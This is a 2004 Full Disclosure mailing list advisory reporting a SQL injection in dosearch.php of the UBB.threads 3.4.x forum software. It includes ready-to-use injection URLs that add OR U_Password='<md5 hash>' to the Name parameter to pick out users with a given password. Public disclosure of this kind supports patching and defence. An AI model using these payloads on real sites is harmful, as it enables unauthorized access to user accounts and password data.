Full Disclosure mailing list archives
SQL Injection in UBB.threads 3.4.x
From: "Florian Rock" <florianrock () web de>
Date: Thu, 21 Oct 2004 22:35:24 +0200
Product: ======== UBB.threads Vendor: ======= UBBCentral (http://www.ubbcentral.com/) Versions: ========= I tested it successfull on 3.4.xAt Version 3.5 you need to be logged in to perform a search. I didnt tested this version.
Problem: ======== Sql-Injection in dosearch.php dosearch.php?Name=' OR U_Password='PWINMD5 Impact: ======= A remote user can inject SQL commands Example: ======== db5c82346d770f48bdd8929094c0c695 (ubbpass) /dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695 OR /dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/* -> selects a user who got "ubbpass" as password. Greets fly out to: ================== felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32, peti, danjo, milch_trinker, hecky, and all i forgot GreetsFlorian Rock aka Remoter
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- SQL Injection in UBB.threads 3.4.x Florian Rock (Oct 21)